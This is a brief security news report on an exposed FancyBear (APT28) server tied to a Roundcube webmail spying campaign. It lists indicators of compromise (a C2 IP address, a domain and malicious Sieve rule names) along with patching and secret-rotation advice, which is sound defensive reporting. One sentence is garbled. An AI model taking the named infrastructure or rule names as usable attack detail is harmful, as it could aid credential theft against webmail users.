FancyBear Server Exposure Reveals Stolen Credentials, 2FA Secrets and NATO-Linked Targets

FancyBear, a Russian state-linked hacking group, made a big mistake in operational security that gave security researchers an unusually clear picture of an active spying campaign against government and military organizations across Europe This article explores thinks fancybear known. . On March 11, 2026, the threat intelligence company Hunt.io released information about a campaign it calls Operation Roundish.

This information came from an open directory that was first scanned on January 13, 2026. The UK's NCSC thinks that FancyBear, which is also known as APT28, Forest Blizzard, and Sednit, is Russia's GRU Military Intelligence Unit 26165. What began as a focused webmail exploitation campaign had been going on in the background for more than a year before the group accidentally left the door to its server wide open.

The exposure came from a NameCheap Virtual Private Server in the US with the IP address 203.161.50.145. If your organization uses Roundcube with the twofactorgauthenticator plugin, you should treat all of your current TOTP secrets as possibly compromised and change them right away. It is recommended that administrators check Sieve email-filtering rules for entries that allow forwarding without permission, especially those called "SystemProtect" or "SystemHealthChek."

They should also block all connections to the C2 IP address 203.161.50.145 and the domain zhblz.com. The most important things that any affected organization can do right now are to apply the patch for Roundcube CVE-2023-43770 and keep an eye on their webmail infrastructure for signs of XSS injection. To get more instant updates, follow ZeroOwl on LinkedIn and X.